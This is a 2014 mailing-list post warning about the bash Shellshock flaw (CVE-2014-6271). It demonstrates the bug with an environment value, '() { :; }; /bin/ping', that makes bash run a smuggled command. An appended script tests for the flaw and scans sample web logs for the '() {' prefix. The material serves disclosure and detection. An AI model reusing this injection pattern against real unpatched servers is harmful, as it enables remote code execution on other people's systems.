[colug-432] Newly-announced bash security hole

Rob Funk rfunk at funknet.net
Wed Sep 24 19:46:13 EDT 2014


Big bug announced today:
  https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271

If you haven't patched your bash today, check this out:

1. Start a new bash subshell.
    $ bash
2. Export a new specially-crafted environment variable:
    $ export FOO='() { :; }; /bin/ping -c 3 127.0.0.1'
3. Start a new bash sub-subshell (under the first subshell):
    $ bash
4. Watch bash ping your machine:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.114 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.101 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.093 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.093/0.102/0.114/0.014 ms

5. Exit the inner subshell.
    $ exit
6. Exit the outer subshell.
    $ exit

7. Imagine what could be done if a malicious person could specify what's in 
environment variables when your system starts bash.

8. Hope you don't have any bash scripts triggered by network actions, e.g. 
CGI scripts.

9. Upgrade bash.

-- 
Rob Funk <rfunk at funknet.net>
http://funknet.net/rfunk
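
The check from steps 1-4 as a non-interactive test, plus a scan for the same "() {" value prefix in web access logs (relevant to the CGI case in step 8). This is an added example, not part of the original post; the function names, the marker string and the sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example for CVE-2014-6271. All names and log lines are constructed.

# Returns 0 if the bash on PATH runs code that trails a function definition
# imported from the environment, 1 if it does not, 2 if bash is not found.
bash_is_vulnerable() {
    command -v bash >/dev/null 2>&1 || return 2
    out=$(env FOO='() { :; }; echo SHELLSHOCK_MARKER' bash -c ':' 2>/dev/null)
    case $out in
        *SHELLSHOCK_MARKER*) return 0 ;;
        *) return 1 ;;
    esac
}

# Reads combined-format access log lines on stdin and prints "N: line" for
# each line where a quoted field (request, Referer, User-Agent) begins with
# "() {", the prefix bash treats as an exported function definition.
flag_function_prefix() {
    awk -F'"' '{
        for (i = 2; i <= NF; i += 2)
            if (index($i, "() {") == 1) { print NR ": " $0; break }
    }'
}

# Constructed sample log: documentation addresses, harmless echo payload.
# Line 4 has "() {" mid-value, which bash does not treat as a function.
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [24/Sep/2014:20:01:02 -0400] "GET /cgi-bin/status.sh HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Sep/2014:20:03:44 -0400] "GET /cgi-bin/status.sh HTTP/1.1" 200 312 "-" "() { :; }; echo probe"
192.0.2.11 - - [24/Sep/2014:20:05:10 -0400] "GET /index.html HTTP/1.1" 200 1043 "() { :; }; echo probe" "curl/7.38.0"
192.0.2.12 - - [24/Sep/2014:20:06:31 -0400] "GET /index.html HTTP/1.1" 200 1043 "-" "Agent/1.0 () { note"
EOF
}

rc=0
bash_is_vulnerable || rc=$?
case $rc in
    0) echo "bash: VULNERABLE to CVE-2014-6271, upgrade it" ;;
    1) echo "bash: trailing code was not executed" ;;
    *) echo "bash: not found on PATH" ;;
esac
sample_log | flag_function_prefix
```

A hit in the logs means a request carried the prefix, not that it succeeded; whether it did depends on whether that request reached an unpatched bash.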

